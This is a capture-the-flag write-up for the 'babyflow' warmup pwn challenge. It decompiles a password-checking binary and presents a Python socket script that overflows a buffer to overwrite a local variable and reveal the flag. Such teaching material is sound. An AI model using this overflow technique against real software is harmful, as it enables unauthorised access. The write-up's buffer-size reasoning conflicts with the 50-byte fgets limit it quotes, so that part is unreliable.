Warmup - Babyflow
Challenge
Warmup PWN Challenge: babyflow Writeup
In this writeup, we'll walk through solving the "Warmup" PWN challenge step by step. The goal is to exploit a buffer overflow vulnerability to bypass a password check and reveal the flag.
Analyzing the Binary
We start by running binary ninja to decompile the file.
We examine the decompiled code snippet:
int32_t main(int32_t argc, char** argv, char** envp)
{
int32_t var_c = 0;
printf("Enter password: ");
fgets(&buf, 50, stdin);
if (strncmp(&buf, "SuPeRsEcUrEPaSsWoRd123", 22) != 0)
puts("Incorrect Password!");
else
puts("Correct Password!");
if (var_c == 0)
puts("Are you sure you are admin? o.O");
else
puts("INTIGRITI{the_flag_is_different_…}");
return 0;
}Trying to use the password
Key Points:
The program asks for a password input and checks it using
strncmpagainst the hardcoded string"SuPeRsEcUrEPaSsWoRd123".If the password is correct, it checks the value of
var_c.If
var_cis still0, it prints a message asking if you are the admin.If
var_cis non-zero, it reveals the flag.
Step 2: Crafting the Exploit
We need to:
Input the correct password to pass the check.
Overflow the buffer to modify
var_cand set it to a non-zero value, which will reveal the flag.
Buffer Overflow:
The buffer size is 50 bytes, and the password takes up the first 22 bytes.
That leaves 28 bytes for padding and overflow.
We need to overflow into
var_c(a 4-byte integer) and set it to1.
Step 3: Writing the Python Exploit
Now, let's write a Python script to send the payload to the server.
import socket
# Connect to the remote server
host = 'babyflow.ctf.intigriti.io'
port = 1331
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
# Receive and print the initial message
response = s.recv(1024).decode('utf-8')
print(response)
# Prepare the exploit payload
password = "SuPeRsEcUrEPaSsWoRd123"
padding = "A" * (50 - len(password)) # Fill the buffer space
overflow_payload = padding + "\x01\x00\x00\x00" # Overwrite var_c with 1
# Send the payload
s.sendall((password + overflow_payload + "\n").encode('utf-8'))
# Receive and print the flag
response = s.recv(1024).decode('utf-8')
print(response)
# Close the connection
s.close()
Step 4: Running the Exploit
Once the script is ready, simply run it using:
python babyflow.pyIf the exploit is successful, the program will print the flag:
Conclusion
This challenge demonstrates a classic buffer overflow attack. We bypass the password check by inputting the correct password, then overflow the buffer to manipulate a local variable (var_c). When var_c is changed from 0 to 1, the program reveals the flag.
By following these steps, we successfully exploited the vulnerability and obtained the flag. This writeup covers the basic principles of exploiting buffer overflows in C programs and how to automate the process using Python.
Last updated